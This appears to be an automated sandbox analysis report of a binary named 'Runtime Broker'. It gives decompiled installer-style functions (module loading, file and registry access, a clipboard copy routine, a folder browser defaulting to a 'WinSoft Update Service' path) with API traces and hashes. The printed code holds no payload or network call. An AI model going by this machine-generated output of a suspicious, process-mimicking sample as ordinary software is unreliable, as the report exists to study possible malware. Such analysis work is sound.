Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406931, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406931(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004068C1(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406939
0x0040693c
0x00406943
0x0040694b
0x00406957
0x00000000
0x0040695e
0x0040694e
0x00406955
0x00000000
0x00406966
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
GetProcAddress.KERNEL32(00000000,?), ref: 0040695E

Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
Opcode Fuzzy Hash: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A

Uniqueness

Uniqueness Score: -1.00%

Function 00406032, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406032(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406036
0x00406043
0x00406058
0x0040605e

APIs

GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405AF0, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AF0(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af6
0x00405afe
0x00000000
0x00405b04
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 004063A9, Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063A9(void* __eflags, char _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040632E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063b3
0x004063ba
0x004063cd
0x00000000
0x004063cd
0x004063be
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422728,?,?,00406437,00422728,00000000,?,?,markers.py,?), ref: 004063CD

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction ID: b93d09ea675ceb766083aeed6388771540e4ed4a45e177d9f546af7c41f1e6d1
Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction Fuzzy Hash: 2CD0123200020EBBDF115F91FD01FAB3B1DAB08710F014426FE06E4091D775D930A765

Uniqueness

Uniqueness Score: -1.00%

Function 00403590, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403590(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040359e
0x004035a4

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004056E3, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004056E3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405677, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406579(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a30c == _t156) {
								E004055A4( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040446B(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040446B(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044F9(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004044C7(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a274;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004044C7( *0x429230);
				 *0x429234 = E00404E20(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404492(_a4);
				if(( *0x42a27c & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a27c & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044C7( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a27c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056eb
0x004056f1
0x004056fb
0x004056fe
0x00405894
0x004058b8
0x004058b8
0x004058cb
0x004058e9
0x004058eb
0x004058f3
0x00405949
0x0040594d
0x00000000
0x00000000
0x0040594f
0x00405955
0x00000000
0x00000000
0x0040595f
0x00405967
0x0040596a
0x00405a6c
0x00000000
0x00405a6c
0x00405979
0x00405984
0x0040598d
0x00405998
0x0040599b
0x004059a4
0x004059aa
0x004059ad
0x004059ad
0x004059c5
0x004059ce
0x004059d1
0x004059d8
0x004059df
0x004059e7
0x004059e7
0x004059fe
0x004059fe
0x00405a05
0x00405a0b
0x00405a17
0x00405a1e
0x00405a27
0x00405a29
0x00405a2c
0x00405a3b
0x00405a3e
0x00405a44
0x00405a45
0x00405a4b
0x00405a4c
0x00405a4d
0x00405a55
0x00405a60
0x00405a66
0x00405a66
0x00000000
0x004059c5
0x004058fb
0x0040592b
0x00405933
0x0040593e
0x0040593e
0x00405944
0x00000000
0x00405944
0x004058ff
0x00405909
0x00000000
0x004058cd
0x004058d3
0x0040590e
0x00000000
0x00405917
0x004058dc
0x004058e1
0x004058e4
0x00000000
0x004058e4
0x004058cb
0x00405704
0x00405708
0x00405710
0x00405714
0x00405717
0x0040571a
0x0040571d
0x00405720
0x00405721
0x00405722
0x0040573b
0x0040573e
0x00405748
0x00405757
0x0040575f
0x00405767
0x0040576c
0x0040576f
0x0040577b
0x00405784
0x0040578d
0x004057af
0x004057b5
0x004057c6
0x004057cb
0x004057d9
0x004057e7
0x004057e7
0x004057ec
0x004057fa
0x004057fa
0x004057ff
0x00405802
0x00405807
0x00405813
0x0040581c
0x00405829
0x00405838
0x0040582b
0x00405830
0x00405830
0x00405844
0x00405844
0x00405858
0x00405861
0x0040586a
0x0040587a
0x00405886
0x00405886
0x00000000

APIs

GetDlgItem.USER32 ref: 00405741
GetDlgItem.USER32 ref: 00405750
GetClientRect.USER32 ref: 0040578D
GetSystemMetrics.USER32 ref: 00405794
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
ShowWindow.USER32(?,00000008), ref: 00405830
GetDlgItem.USER32 ref: 00405851
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
GetDlgItem.USER32 ref: 0040575F

Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5

GetDlgItem.USER32 ref: 004058A3
CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
CloseHandle.KERNEL32(00000000), ref: 004058B8
ShowWindow.USER32(00000000), ref: 004058DC
ShowWindow.USER32(?,00000008), ref: 004058E1
ShowWindow.USER32(00000008), ref: 0040592B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
CreatePopupMenu.USER32 ref: 00405970
AppendMenuW.USER32 ref: 00405984
GetWindowRect.USER32 ref: 004059A4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
OpenClipboard.USER32(00000000), ref: 00405A05
EmptyClipboard.USER32 ref: 00405A0B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
GlobalLock.KERNEL32 ref: 00405A21
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
GlobalUnlock.KERNEL32(00000000), ref: 00405A55
SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
CloseClipboard.USER32 ref: 00405A66

Strings

{, xrefs: 00405949
H7B, xrefs: 004059D1

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: f502530ced2c1a214886eb4371a29ed60aa9404afe0e8b66a48e989dbee1ad0b
Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
Opcode Fuzzy Hash: f502530ced2c1a214886eb4371a29ed60aa9404afe0e8b66a48e989dbee1ad0b
Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404983, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404983(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B86(0x3fb, _t146);
					E004067EB(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B86(0x3fb, _t146);
							if(E00405F19(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653C(0x421718, _t146);
							_t87 = E00406931(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653C(0x421718, _t146);
								_t89 = E00405EBC(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E5D(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E20(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404E08(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404D3F(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a324 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044B4(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E004048DC();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404CD9;
							_v56 = _t146;
							_v68 = E00406579(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E11(_t146);
								_t125 =  *((intOrPtr*)( *0x42a274 + 0x11c));
								if( *((intOrPtr*)( *0x42a274 + 0x11c)) != 0 && _t146 == L"C:\\Program Files (x86)\\WinSoft Update Service") {
									E00406579(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E88(_t146) != 0 && E00405EBC(_t146) == 0) {
						E00405E11(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404492(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404492(_t167);
					E004044C7(_t166);
					_t138 = E00406931(8);
					if(_t138 == 0) {
						L53:
						return E004044F9(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404983
0x00404989
0x0040498f
0x0040499c
0x004049aa
0x004049ad
0x004049b5
0x004049bb
0x004049bb
0x004049c7
0x004049ca
0x00404a38
0x00404a3f
0x00404b16
0x00404b1d
0x00404b2c
0x00404b2c
0x00404b30
0x00404b3a
0x00404b47
0x00404b49
0x00404b49
0x00404b57
0x00404b5e
0x00404b65
0x00404b68
0x00404ba4
0x00404ba6
0x00404bac
0x00404bb1
0x00404bb5
0x00404bb7
0x00404bb7
0x00404bd3
0x00000000
0x00404bd5
0x00404bd8
0x00404be6
0x00404bec
0x00404bed
0x00404bf0
0x00404bf3
0x00000000
0x00404bf3
0x00404b6a
0x00404b6c
0x00404b70
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b72
0x00404b72
0x00404b7f
0x00404b84
0x00000000
0x00000000
0x00404b88
0x00404b8a
0x00404b8a
0x00404b93
0x00404b95
0x00404b9a
0x00404b9d
0x00404ba2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ba2
0x00404bff
0x00404c09
0x00404c0c
0x00404c0f
0x00404c16
0x00404c16
0x00404c18
0x00404c18
0x00404c1d
0x00404c1f
0x00404c27
0x00404c2e
0x00404c30
0x00404c3b
0x00404c3b
0x00404c30
0x00404c4b
0x00404c55
0x00404c5d
0x00404c78
0x00404c5f
0x00404c68
0x00404c68
0x00404c5d
0x00404c7d
0x00404c82
0x00404c87
0x00404c90
0x00404c90
0x00404c99
0x00404c9b
0x00404c9b
0x00404ca7
0x00404caf
0x00404cb9
0x00404cb9
0x00404cbe
0x00000000
0x00404cbe
0x00404b68
0x00404b1f
0x00404b26
0x00000000
0x00000000
0x00000000
0x00404b26
0x00404a45
0x00404a4e
0x00404a68
0x00404a6d
0x00404a77
0x00404a7e
0x00404a8a
0x00404a8d
0x00404a90
0x00404a97
0x00404a9f
0x00404aa2
0x00404aa6
0x00404aad
0x00404ab5
0x00404b0f
0x00404ab7
0x00404ab8
0x00404abf
0x00404ac9
0x00404ad1
0x00404ade
0x00404af2
0x00404af6
0x00404af6
0x00404af2
0x00404afb
0x00404b08
0x00404b08
0x00404ab5
0x00000000
0x00404a6d
0x00404a5b
0x00000000
0x00000000
0x00404a61
0x00000000
0x004049cc
